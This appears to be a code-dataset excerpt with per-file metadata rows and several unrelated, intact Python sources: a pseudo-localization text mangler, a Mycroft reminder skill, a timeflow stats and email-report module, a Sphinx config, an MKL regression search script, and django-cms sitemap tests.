| apache-2.0 | -2,508,662,527,030,706,000 | 34.798928 | 79 | 0.558751 | false |
perfectsearch/sandman | code/buildscripts/l10n/martian.py | 1 | 3863 | #!/usr/bin/env python
#
# $Id: martian.py 9318 2011-06-10 02:37:10Z nathan_george $
#
# Proprietary and confidential.
# Copyright $Date:: 2011#$ Perfect Search Corporation.
# All rights reserved.
#
import random, re
_SUBST = {
'a': [u'a',u'\u00e1',u'\u00e2',u'\u00e3',u'\u00e5',u'\u0430',u'\u0410',u'\u0391',u'\u0386',u'\u03ac',u'\u03b1',u'\u30e0',u'\u30aa',u'\u11ba'],
'e': [u'e',u'\u0415',u'\u0435',u'\u042d',u'\u044d',u'\u0388',u'\u0395',u'\u03b5',u'\u03f5',u'\u03f6',u'\u30e7'],
'i': [u'i',u'\u0407',u'\uff74',u'\u0456',u'\u0457',u'\u03b9',u'\u03af',u'\u03ca',u'\u30a7',u'\u0671'],
'o': [u'o',u'\u03bf',u'\u03cc',u'\uff9b',u'\u00f5',u'\u00f4',u'\u03d9',u'\u1f42',u'\u1f48',u'\u041e',u'\u043e',u'\u30ed',u'\u05e1',u'\u0ae6'],
'u': [u'u',u'\u00b5',u'\u00fa',u'\u00fb',u'\u00fc',u'\u03c5',u'\u03cb',u'\u03cd',u'\u03b0',u'\u0646'],
's': [u's',u'$',u'\u0abd',u'\uff53'],
't': [u't',u'\u03ee',u'\uff34'],
'b': [u'b',u'\u03d0',u'\u00df',u'\uff42'],
'n': [u'n',u'\u00f1'],
}
WORD_PAT = re.compile(u"[a-z]+['a-z][a-z]+", re.IGNORECASE)
UNICODE_TYPE = type(u'')
def endsWithVowel(word):
return u'aeiou'.find(word[-1]) > -1
def convertWord(word):
# Always randomize based on length of word, so that same words get same form.
# This helps to keep the converted forms of complete text files stable as some
# strings are added and subtracted.
r = random.Random(len(word))
startIdx = 0
word2 = u''
# Keep initial caps
if word[0] == word[0].upper():
word2 = word[0]
startIdx = 1
# Substitute chars that are visually similar
for i in range(startIdx, len(word)):
c = word[i]
if c in _SUBST:
alts = _SUBST[c]
word2 = word2 + alts[r.randint(0, len(alts) - 1)]
elif i % 2 == 0:
word2 = word2 + c.upper()
else:
word2 = word2 + c.lower()
# Make words longer, on average, than English.
wordLen = len(word)
if endsWithVowel(word):
justChar = u'h'
else:
justChar = word2[-1]
if wordLen < 5:
word2 = word2 + justChar
else:
extra = r.randint(0, int(max(.5 * wordLen, 3)))
word2 = word2 + u''.rjust(extra, justChar)
return word2
def convert(txt):
if type(txt) != UNICODE_TYPE:
txt = unicode(str(txt), 'utf-8')
# Replace some spaces with x to make words longer (tests whether
# layout handles word wrapping in a flexible and reasonable way).
i = 0
n = 0
while True:
i = txt.find(u' ', i)
if i == -1:
break
# Do a substitution every third word
if (i > 0) and (i < len(txt) - 1) and txt[i-1].isalpha() and txt[i+1].isalpha():
if n % 3 == 1:
txt = txt[0:i] + u'X' + txt[i+1:]
n = n + 1
elif n % 3 != 1:
n = n + 1
i = i + 1
output = u''
while True:
m = WORD_PAT.search(txt)
if not m:
break
output = output + txt[0:m.start()]
output = output + convertWord(m.group(0))
txt = txt[m.end():]
output += txt
# Always put hash marks at beginning and end, so we can easily tell
# if the full string is displayed or only a partial string.
# Ignore @@ comments.
if output.find('@@') > -1:
return u'#' + output[:output.find('@@')] + u'#' + output[output.find('@@'):]
return u'#' + output + '#'
if __name__ == '__main__':
print(convert("almost, this is a test"))
print(convert("&Open"))
print(convert("&Close"))
print(convert("&Next"))
print(convert("The quick brown fox, jumped (smoothly) over the small red dog."))
print(convert("""This is a paragraph of text.
I hope that it all converts smoothly.
The quick brown fox, jumped (smoothly) over the small striped red dog."""))
| mit | 7,911,633,751,153,652,000 | 35.443396 | 146 | 0.550349 | false |
JarbasAI/JarbasAI | jarbas_skills/skill-reminder/__init__.py | 3 | 5237 | # Copyright 2016 Mycroft AI, Inc.
#
# This file is part of Mycroft Core.
#
# Mycroft Core is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Mycroft Core is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Mycroft Core. If not, see <http://www.gnu.org/licenses/>.
import time
from alsaaudio import Mixer
from datetime import datetime, timedelta
import re
import yaml
from adapt.intent import IntentBuilder
from os.path import dirname
from mycroft.skills.scheduled_skills import ScheduledCRUDSkill
__author__ = 'jdorleans'
# TODO - Localization, Sandbox
class ReminderSkill(ScheduledCRUDSkill):
PRONOUNS = {'i': 'you', 'me': 'you', 'my': 'your', 'myself': 'yourself',
'am': 'are', "'m": "are", "i'm": "you're"}
def __init__(self):
super(ReminderSkill, self).__init__(
"ReminderSkill", None)
self.reminder_on = False
self.max_delay = self.config.get('max_delay')
self.repeat_time = self.config.get('repeat_time')
self.extended_delay = self.config.get('extended_delay')
def initialize(self):
super(ReminderSkill, self).initialize()
intent = IntentBuilder(
'ReminderSkillStopIntent').require('ReminderSkillStopVerb') \
.require('ReminderSkillKeyword').build()
self.register_intent(intent, self.__handle_stop)
def load_data(self):
try:
with self.file_system.open(self.PENDING_TASK, 'r') as f:
self.data = yaml.safe_load(f)
assert self.data
except:
self.data = {}
def load_repeat_data(self):
try:
with self.file_system.open(self.REPEAT_TASK, 'r') as f:
self.repeat_data = yaml.safe_load(f)
assert self.repeat_data
except:
self.repeat_data = {}
def __handle_stop(self, message):
if self.reminder_on:
self.speak_dialog('reminder.off')
self.reminder_on = False
def notify(self, timestamp):
with self.LOCK:
if self.data.__contains__(timestamp):
volume = None
self.reminder_on = True
delay = self.__calculate_delay(self.max_delay)
while self.reminder_on and datetime.now() < delay:
self.speak_dialog(
'reminder.notify',
data=self.build_feedback_payload(timestamp))
time.sleep(1)
self.speak_dialog('reminder.stop')
time.sleep(self.repeat_time)
if not volume and datetime.now() >= delay:
mixer = Mixer()
volume = mixer.getvolume()[0]
mixer.setvolume(100)
delay = self.__calculate_delay(self.extended_delay)
if volume:
Mixer().setvolume(volume)
self.remove(timestamp)
self.reminder_on = False
self.save()
@staticmethod
def __calculate_delay(seconds):
return datetime.now() + timedelta(seconds=seconds)
def add(self, date, message):
utterance = message.data.get('utterance').lower()
utterance = utterance.replace(
message.data.get('ReminderSkillCreateVerb'), '')
utterance = self.__fix_pronouns(utterance)
self.repeat_data[date] = self.time_rules.get_week_days(utterance)
self.data[date] = self.__remove_time(utterance).strip()
def __fix_pronouns(self, utterance):
msg = utterance.strip()
for key, val in self.PRONOUNS.iteritems():
k = key.lower()
v = val.lower()
msg = msg.replace(' ' + k + ' ', ' ' + v + ' ')
msg = re.sub('^' + key + ' ', val + ' ', msg)
msg = re.sub(' ' + key + '$', ' ' + val, msg)
return msg
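    # Illustrative behaviour of the pronoun swap above (utterance invented):
    #   'remind me to call my dentist' -> 'remind you to call your dentist'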
def __remove_time(self, utterance):
pos = (0, 0)
for regex in self.time_rules.rules.get('time_regex'):
pattern = re.compile(regex, re.IGNORECASE)
result = pattern.search(utterance)
if result:
span = result.span()
if (pos[1] - pos[0]) < (span[1] - span[0]):
pos = span
msg = utterance[:pos[0]] + utterance[pos[1]:]
if pos[0] != pos[1]:
msg = self.__remove_time(msg)
return msg
def save(self):
with self.file_system.open(self.PENDING_TASK, 'w') as f:
yaml.safe_dump(self.data, f)
with self.file_system.open(self.REPEAT_TASK, 'w') as f:
yaml.safe_dump(self.repeat_data, f)
self.schedule()
def stop(self):
self.__handle_stop(None)
def create_skill():
return ReminderSkill()
| gpl-3.0 | -8,863,748,726,465,021,000 | 34.62585 | 76 | 0.568837 | false |
trimailov/timeflow | timeflow/stats.py | 1 | 10902 | import datetime as dt
import smtplib
from collections import defaultdict
from collections import OrderedDict
from timeflow.settings import Settings
from timeflow.utils import DATE_FORMAT
from timeflow.utils import DATETIME_FORMAT
from timeflow.utils import calc_time_diff
from timeflow.utils import date_begins
from timeflow.utils import date_ends
from timeflow.utils import format_duration_long
from timeflow.utils import format_duration_short
from timeflow.utils import get_time
from timeflow.utils import parse_lines
from timeflow.utils import strip_log
def get_total_stats_times(work_time, slack_time, today_work_time):
"""
Returns string output for totals times spent working and slacking
"""
output = 'Work: {}\n'.format(format_duration_short(sum(work_time)))
output += 'Slack: {}'.format(format_duration_short(sum(slack_time)))
if today_work_time:
today_hours, today_minutes = get_time(today_work_time)
output += '\n\nToday working for: {}'.format(
format_duration_short(today_work_time)
)
return output
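# Example of the summary built above (numbers invented): with two hours of
# work, twenty minutes of slack and 45 minutes worked today, the output has
# the shape
#   Work: <2 hours>
#   Slack: <20 minutes>
#
#   Today working for: <45 minutes>
# with the exact duration strings produced by format_duration_short().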
def create_report(report_dict):
"""
Returns string output for stats report
"""
output = ""
report_dict = OrderedDict(sorted(report_dict.items()))
for project in report_dict:
project_output = "{}:\n".format(project)
project_report = report_dict[project]
total_seconds = 0
for log in project_report:
log_seconds = project_report[log]
total_seconds += log_seconds
# if log is empty - just state the project name
if not log:
log = project
project_output += " {time}: {log}\n".format(
time=format_duration_long(log_seconds),
log=log
)
project_output += " Total: {time}\n".format(
time=format_duration_long(total_seconds),
)
output += project_output
output += '\n'
# remove trailing newlines as they may add up in the pipeline
return output.strip('\n')
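# Illustrative call for create_report() (project/log names and durations are
# invented):
#   create_report({'timeflow': {'write docs': 3600, 'fix tests': 1800}})
# produces, roughly:
#   timeflow:
#     <1 hour>: write docs
#     <30 minutes>: fix tests
#     Total: <1 hour 30 minutes>
# with the exact time strings coming from format_duration_long().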
def create_full_report(work_report_dict, slack_report_dict):
"""
Returns report for both - work and slack
"""
output = ""
work_report = create_report(work_report_dict)
slack_report = create_report(slack_report_dict)
output += "{:-^67s}\n".format(" WORK ")
output += work_report
output += "\n" # I want empty line between work and slack report
output += "{:-^67s}\n".format(" SLACK ")
output += slack_report
return output
def create_report_as_gtimelog(report_dict, literal_time_range=''):
"""
Returns string output for report which is generated as in gtimelog
"""
output = ""
project_totals_output = ""
output += "{}{}\n".format(" " * 64, "time")
report_dict = OrderedDict(sorted(report_dict.items()))
total_seconds = 0
for project in report_dict:
total_project_seconds = 0
project_report = report_dict[project]
for log in project_report:
entry = "{}: {}".format(project, log)
seconds = project_report[log]
time_string = format_duration_short(seconds)
output += "{:62s} {}\n".format(entry, time_string)
total_project_seconds += seconds
project_totals_output += "{:62s} {}\n".format(project, format_duration_short(total_project_seconds))
total_seconds += total_project_seconds
output += "\n"
output += "Total work done{}{}: {}\n\n".format(
' ' if literal_time_range else '', # add space if time range exists
literal_time_range,
format_duration_short(total_seconds)
)
output += "By category:\n\n"
output += project_totals_output
return output
def calculate_stats(lines, date_from, date_to, today=False):
work_time = []
slack_time = []
today_work_time = None
line_begins = date_begins(lines, date_from)
line_ends = date_ends(lines, date_to)
date_not_found = (line_begins is None or line_ends < line_begins)
if date_not_found:
return work_time, slack_time, today_work_time
data = parse_lines()
for i, line in enumerate(data[line_begins:line_ends + 1]):
# if we got to the last line - stop
if line_begins + i + 1 > line_ends:
break
next_line = data[line_begins + i + 1]
line_date = line.date
next_line_date = next_line.date
# if it's day switch, skip this cycle
if line_date != next_line_date:
continue
if next_line.is_slack:
slack_time.append(calc_time_diff(line, next_line))
else:
work_time.append(calc_time_diff(line, next_line))
if today:
today_start_time = dt.datetime.strptime(
"{} {}".format(data[line_begins].date, data[line_begins].time),
DATETIME_FORMAT
)
today_work_time = (dt.datetime.now() - today_start_time).seconds
return work_time, slack_time, today_work_time
def calculate_report(lines, date_from, date_to,
filter_projects=[],
exclude_projects=[]):
"""Creates and returns report dictionaries
Report dicts have form like this:
    {<Project>: {<log_message>: <accumulative time>,
                 <log_message1>: <accumulative time1>}}
"""
# XXX: need to check that same project is not in both: filters and excludes
work_dict = defaultdict(lambda: defaultdict(dict))
slack_dict = defaultdict(lambda: defaultdict(dict))
line_begins = date_begins(lines, date_from)
line_ends = date_ends(lines, date_to)
date_not_found = (line_begins is None or line_ends < line_begins)
if date_not_found:
return work_dict, slack_dict
data = parse_lines()
for i, line in enumerate(data[line_begins:line_ends + 1]):
# if we got to the last line - stop
if line_begins + i + 1 > line_ends:
break
next_line = data[line_begins + i + 1]
line_date = line.date
next_line_date = next_line.date
# if it's day switch, skip this cycle
if line_date != next_line_date:
continue
time_diff = calc_time_diff(line, next_line)
project = strip_log(next_line.project)
if project_should_be_in_report(project, filter_projects, exclude_projects):
log = strip_log(next_line.log)
if next_line.is_slack:
# if log message is identical add time_diff
# to total time of the log
if slack_dict[project][log]:
total_time = slack_dict[project][log]
total_time += time_diff
slack_dict[project][log] = total_time
else:
slack_dict[project][log] = time_diff
else:
if work_dict[project][log]:
total_time = work_dict[project][log]
total_time += time_diff
work_dict[project][log] = total_time
else:
work_dict[project][log] = time_diff
return work_dict, slack_dict
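# Sketch of the report dict shape documented above (all values invented):
#   work_dict  = {'timeflow': {'write docs': 3600},
#                 'email':    {'': 900}}
#   slack_dict = {'hackernews': {'reading': 600}}
# i.e. project -> log message -> accumulated seconds, where an empty log
# message later falls back to the project name in create_report().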
def project_should_be_in_report(project, filters, excludes):
if project in filters:
return True
elif project in excludes:
return False
elif filters == []:
return True
elif excludes == []:
return False
def get_daily_report_subject(day, person):
"""
Returns subject string for daily report email
`day:datetime.date` - date of the day we are reporting for
`person:str` - reporting person's name, e.g. 'Jon Doe'
"""
# it's possible to use strftime('%a'), but it's locale sensitive,
# and I do not want this
weekday_names = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']
calendar_time = "{weekday}, week {week:02}".format(
        # isocalendar()[2] is 1-based (Monday == 1), hence the -1 shift
        weekday=weekday_names[day.isocalendar()[2] - 1],
week=day.isocalendar()[1],
)
subject = "{day} report for {person} ({calendar_time})".format(
day=day.strftime(DATE_FORMAT),
person=person,
calendar_time=calendar_time
)
return subject
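# Example (date and name arbitrary, and assuming DATE_FORMAT is '%Y-%m-%d'):
# for day = datetime.date(2015, 7, 1) and person = 'Jon Doe', with the 1-based
# ISO weekday shifted as above, the subject is
#   '2015-07-01 report for Jon Doe (Wed, week 27)'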
def get_weekly_report_subject(week_day, person):
"""
Returns subject string for weekly report email
`week_day:datetime.date` - any date for the week we are reporting for
`person:str` - reporting person's name, e.g. 'Jon Doe'
"""
calendar_time = "week {:02}".format(week_day.isocalendar()[1])
subject = "Weekly report for {person} ({calendar_time})".format(
person=person,
calendar_time=calendar_time
)
return subject
def get_monthly_report_subject(month_day, person):
"""
Returns subject string for monthly report email
`month_day:datetime.date` - any date for the month we are reporting for
`person:str` - reporting person's name, e.g. 'Jon Doe'
"""
calendar_time = "{year}/{month:02}".format(
year=month_day.year,
month=month_day.month
)
subject = "Monthly report for {person} ({calendar_time})".format(
person=person,
calendar_time=calendar_time
)
return subject
def get_custom_range_report_subject(date_from, date_to, person):
subject = "Custom date range report for {person} ({_from:%Y-%m-%d} - {to:%Y-%m-%d})".format(
person=person,
_from=date_from,
to=date_to,
)
return subject
def email_report(date_from, date_to, report, email_time_range=None):
settings = Settings()
settings.load()
sender = settings.email_address
receivers = [settings.activity_email]
date_from_time_range = dt.datetime.strptime(date_from, DATE_FORMAT)
subject = ''
if email_time_range == 'day':
subject = get_daily_report_subject(date_from_time_range, settings.name)
elif email_time_range == 'week':
subject = get_weekly_report_subject(date_from_time_range, settings.name)
elif email_time_range == 'month':
subject = get_monthly_report_subject(date_from_time_range, settings.name)
else:
# convert date strings to datetime objects
_date_from = dt.datetime.strptime(date_from, DATE_FORMAT)
_date_to = dt.datetime.strptime(date_to, DATE_FORMAT)
subject = get_custom_range_report_subject(_date_from, _date_to, settings.name)
full_subject = "[Activity] {}".format(subject)
message = (
"From: {}\n"
"To: {}\n"
"Subject: {}\n\n"
"{}"
).format(sender, ", ".join(receivers), full_subject, report)
try:
conn = smtplib.SMTP(settings.smtp_server, settings.smtp_port)
conn.ehlo()
conn.starttls()
conn.login(settings.email_user, settings.email_password)
conn.sendmail(sender, receivers, message)
print("Successfully sent email")
except smtplib.SMTPException:
print("Error: unable to send email")
| mit | -1,327,857,093,059,372,500 | 31.640719 | 109 | 0.608604 | false |
Darthone/bug-free-octo-parakeet | docs/source/conf.py | 2 | 5299 | # -*- coding: utf-8 -*-
#
# Informed Finance Canary documentation build configuration file, created by
# sphinx-quickstart on Thu Mar 9 20:29:30 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath("../ifc"))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.imgmath',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
'numpydoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Informed Finance Canary'
copyright = u'2017, Dario Marasco, Anand Patel, Wei-Ming Koh, Trey Harper'
author = u'Dario Marasco, Anand Patel, Wei-Ming Koh, Trey Harper'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'1.0'
# The full version, including alpha/beta/rc tags.
release = u'1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'InformedFinanceCanarydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'InformedFinanceCanary.tex', u'Informed Finance Canary Documentation',
u'Dario Marasco, Anand Patel, Wei-Ming Koh, Trey Harper', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'informedfinancecanary', u'Informed Finance Canary Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'InformedFinanceCanary', u'Informed Finance Canary Documentation',
author, 'InformedFinanceCanary', 'One line description of project.',
'Miscellaneous'),
]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
| mit | -3,840,951,447,199,581,700 | 30.541667 | 87 | 0.683714 | false |
nachitoys/distributionalSemanticStabilityThesis | mkl.py | 2 | 6182 | from modshogun import *
from numpy import *
from sklearn.metrics import r2_score
from scipy.stats import randint
from scipy.stats import randint as sp_randint
from scipy.stats import expon
from mkl_regressor import *
from time import localtime, strftime
if __name__ == "__main__":
import Gnuplot, Gnuplot.funcutils
from sklearn.grid_search import RandomizedSearchCV as RS
from argparse import ArgumentParser as ap
parser = ap(description='This script trains/applies a SVR over any input dataset of numerical representations. The main aim is to determine a set of learning parameters')
parser.add_argument("-x", help="Input file name (train vectors)", metavar="input_file", default=None)
parser.add_argument("-y", help="""Regression labels file. Do not specify this argument if you want to uniauely predict over any test set. In this case, you must to specify
the SVR model to be loaded as the parameter of the option -o.""", metavar="regrLabs_file", default = None)
parser.add_argument("-X", help="Input file name (TEST vectors)", metavar="test_file", default = None)
parser.add_argument("-Y", help="Test labels file.", metavar="testLabs_file", default = None)
parser.add_argument("-n", help="Number of tests to be performed.", metavar="tests_amount", default=1)
parser.add_argument("-o", help="""The operation the input data was derived from. Options: {'conc', 'convss', 'sub'}. In the case you want to give a precalculated center for
width randomization (the median width), specify the number. e.g. '-o 123.654'. A filename can be specified, which is the file where a pretrained MKL model,
e.g. '-o filename.model'""", metavar="median", default=0.01)
#parser.add_argument("-u", help="Especify C regulazation parameter. For a list '-u C:a_b', for a value '-u C:a'.", metavar="fixed_params", default = None)
#parser.add_argument("-K", help="Kernel type custom specification. Uniquely valid if -u is not none. Options: gaussian, linear, sigmoid.", metavar="kernel", default = None)
#parser.add_argument("-s", help="Toggle if you will process sparse input format.", action="store_true", default = False)
parser.add_argument("--estimate", help="Toggle if you will predict the training.", action="store_true", default = False)
parser.add_argument("--predict", help="Toggle if you will predict just after estimating (This is assumed if you provide a model file instead of a medianwidth: option '-m'.).", action="store_true", default = False)
parser.add_argument("-k", help="k-fold cross validation for the randomized search.", metavar="k-fold_cv", default=None)
parser.add_argument("-p", help="Minimum number of basis kernels.", metavar="min_amount", default=2)
parser.add_argument("-P", help="Maximum number of basis kernels.", metavar="max_amount", default=10)
args = parser.parse_args()
#name_components = shatter_file_name()
model_file = None # "/almac/ignacio/data/mkl_models/mkl_0.model"
out_file = "mkl_outs/mkl_idx_corpus_source_repr_dims_op_other.out"
    if args.X: # Test set vectors.
        data_t = loadtxt(args.X) #loadtxt("/almac/ignacio/data/sts_all/pairs-NO_2013/vectors_H10/pairs_eng-NO-test-2e6-nonempty_FNWN_d2v_H10_sub_m5w8.mtx")
    if args.Y: # Test set labels.
        labels_t = loadtxt(args.Y) #loadtxt("/almac/ignacio/data/sts_all/pairs-NO_2013/STS.gs.FNWN.txt")
if args.x != None:
assert args.y # If training data given, supply corresponding labels.
labels = loadtxt(args.y) #loadtxt("/almac/ignacio/data/sts_all/pairs-NO_2013/STS.gs.OnWN.txt")
data = loadtxt(args.x) #loadtxt("/almac/ignacio/data/sts_all/pairs-NO_2013/vectors_H10/pairs_eng-NO-test-2e6-nonempty_OnWN_d2v_H10_sub_m5w8.mtx")
k = int(args.k)
N = int(args.n)
min_p = int(args.p)
max_p = int(args.P)
median_w = float(args.o)
# median_width = None, width_scale = 20.0, min_size=2, max_size = 10, kernel_size = None
sys.stderr.write("\n>> [%s] Training session begins...\n" % (strftime("%Y-%m-%d %H:%M:%S", localtime())))
params = {'svm_c': expon(scale=100, loc=0.001),
'mkl_c': expon(scale=100, loc=0.001),
'degree': sp_randint(0, 24),
#'widths': expon_vector(loc = m, min_size = 2, max_size = 10)
'width_scale': [0.5, 1.0, 2.0, 2.5, 3.0, 3.5, 4.0],
'median_width': expon(scale=1, loc=median_w),
'kernel_size': [2, 3, 4, 5, 6, 7, 8] }
param_grid = []
for i in xrange(N):
param_grid.append(params)
i = 0
for params in param_grid:
mkl = mkl_regressor()
rs = RS(mkl, param_distributions = params, n_iter = 20, n_jobs = 24, cv = k, scoring="mean_squared_error")#"r2")
rs.fit(data, labels)
rs.best_estimator_.save('/almac/ignacio/data/mkl_models/mkl_%d.model' % i)
if args.estimate: # If user wants to save estimates
test_predict(data = data, machine = rs.best_estimator_, labels = labels, out_file = out_file)
if args.predict: # If user wants to predict and save just after training.
assert not args.X is None # If test data is provided
#preds = rs.best_estimator_.predict(data_t)
if args.Y: # Get performance if test labels are provided
test_predict(data = data_t, machine = rs.best_estimator_, labels = labels_t, out_file = out_file + ".pred")
else: # Only predictions
test_predict(data = data_t, machine = rs.best_estimator_, out_file = out_file + ".pred")
sys.stderr.write("\n:>> [%s] Finished!!\n" % (strftime("%Y-%m-%d %H:%M:%S", localtime())))
else:
idx = 0
        test_predict(data = data_t, machine = "mkl_regression", file="/almac/ignacio/data/mkl_models/mkl_%d.asc" % idx,
                                labels = labels_t, out_file = out_file)
sys.stderr.write("\n:>> [%s] Finished!!\n" % (strftime("%Y-%m-%d %H:%M:%S", localtime())))
| gpl-2.0 | -2,368,194,713,678,559,700 | 66.195652 | 217 | 0.626658 | false |
isotoma/django-cms | cms/tests/sitemap.py | 18 | 6524 | # -*- coding: utf-8 -*-
from cms.models import Title, Page
from cms.sitemaps import CMSSitemap
from cms.test_utils.testcases import CMSTestCase
from cms.api import create_page, create_title
from cms.test_utils.util.context_managers import SettingsOverride
class SitemapTestCase(CMSTestCase):
def setUp(self):
"""
Tree from fixture:
+ P1 (de, en)
| + P2 (de, en)
| + P3 (de, en)
| + P9 (de unpublished, en)
| + P10 unpublished (de, en)
| + P11 (en)
+ P4 (de, en)
| + P5 (de, en)
+ P6 (de, en) (not in menu)
+ P7 (de, en)
+ P8 (de, en)
"""
defaults = {
'template': 'nav_playground.html',
'language': 'en',
}
with SettingsOverride(CMS_PERMISSION=False):
p1 = create_page('P1', published=True, in_navigation=True, **defaults)
create_title(language='de', title="other title %s" % p1.get_title('en'), page=p1)
p4 = create_page('P4', published=True, in_navigation=True, **defaults)
create_title(language='de', title="other title %s" % p4.get_title('en'), page=p4)
p6 = create_page('P6', published=True, in_navigation=False, **defaults)
create_title(language='de', title="other title %s" % p6.get_title('en'), page=p6)
p2 = create_page('P2', published=True, in_navigation=True, parent=p1, **defaults)
create_title(language='de', title="other title %s" % p2.get_title('en'), page=p2)
p3 = create_page('P3', published=True, in_navigation=True, parent=p2, **defaults)
create_title(language='de', title="other title %s" % p3.get_title('en'), page=p3)
p5 = create_page('P5', published=True, in_navigation=True, parent=p4, **defaults)
create_title(language='de', title="other title %s" % p5.get_title('en'), page=p5)
p7 = create_page('P7', published=True, in_navigation=True, parent=p6, **defaults)
create_title(language='de', title="other title %s" % p7.get_title('en'), page=p7)
p8 = create_page('P8', published=True, in_navigation=True, parent=p6, **defaults)
create_title(language='de', title="other title %s" % p8.get_title('en'), page=p8)
p9 = create_page('P9', published=True, in_navigation=True, parent=p1, **defaults)
create_title(language='de', title="other title %s" % p9.get_title('en'), page=p9)
p10 = create_page('P10', published=False, in_navigation=True, parent=p9, **defaults)
create_title(language='de', title="other title %s" % p10.get_title('en'), page=p10)
create_page('P11', published=True, in_navigation=True, parent=p9, **defaults)
p1 = p1.reload()
p2 = p2.reload()
p3 = p3.reload()
p4 = p4.reload()
p5 = p5.reload()
p6 = p6.reload()
p7 = p7.reload()
p8 = p8.reload()
p8.publish('de')
p7.publish('de')
p5.publish('de')
p3.publish('de')
p2.publish('de')
p6.publish('de')
p4.publish('de')
p1.publish('de')
self.assertEqual(Title.objects.filter(published=True, publisher_is_draft=False).count(), 18)
def test_sitemap_count(self):
"""
Has the sitemap the correct number of elements?
"""
sitemap = CMSSitemap()
# 8 pages with en and de titles published
        # 1 page published only in english (with existing de title)
# 1 page with both titles but unpublished
# 1 page with only english title
self.assertEqual(sitemap.items().count(), 18)
def test_sitemap_items_location(self):
"""
Check the correct URL in location, recreating it according to the title
attributes (instead of using Page.get_absolute_url) for a lower level
check
"""
sitemap = CMSSitemap()
urlset = sitemap.get_urls()
for item in urlset:
if item['item'].path:
url = 'http://example.com/%s/%s/' % (item['item'].language, item['item'].path)
else:
url = 'http://example.com/%s/%s' % (item['item'].language, item['item'].path)
self.assertEqual(item['location'], url)
def test_sitemap_published_titles(self):
"""
Check that published titles are in the urls
"""
sitemap = CMSSitemap()
locations = []
urlset = sitemap.get_urls()
for item in urlset:
locations.append(item['location'])
for title in Title.objects.public():
page = title.page.get_public_object()
if title.path:
url = 'http://example.com/%s/%s/' % (title.language, title.path)
else:
url = 'http://example.com/%s/%s' % (title.language, title.path)
if page.is_published('en') and not page.publisher_is_draft:
self.assertTrue(url in locations)
else:
self.assertFalse(url in locations)
def test_sitemap_unpublished_titles(self):
"""
Check that titles attached to unpublished pages are not in the urlset.
As titles are 'published' depending on their attached page, we create a
set of unpublished titles by checking titles attached to the draft and
public version of each page
"""
sitemap = CMSSitemap()
locations = []
urlset = sitemap.get_urls()
unpublished_titles = set()
for item in urlset:
locations.append(item['location'])
for page in Page.objects.drafts():
if page.get_public_object():
set1 = set(page.get_public_object().title_set.values_list('path', flat=True))
set2 = set(page.title_set.values_list('path', flat=True))
unpublished_titles.update(set2.difference(set1))
else:
unpublished_titles.update(page.title_set.values_list('path', flat=True))
for path in unpublished_titles:
title = Title.objects.get(path=path)
if title.path:
url = 'http://example.com/%s/%s/' % (title.language, title.path)
else:
url = 'http://example.com/%s/%s' % (title.language, title.path)
self.assertFalse(url in locations)
| bsd-3-clause | 4,840,892,718,469,946,000 | 41.363636 | 104 | 0.55794 | false |
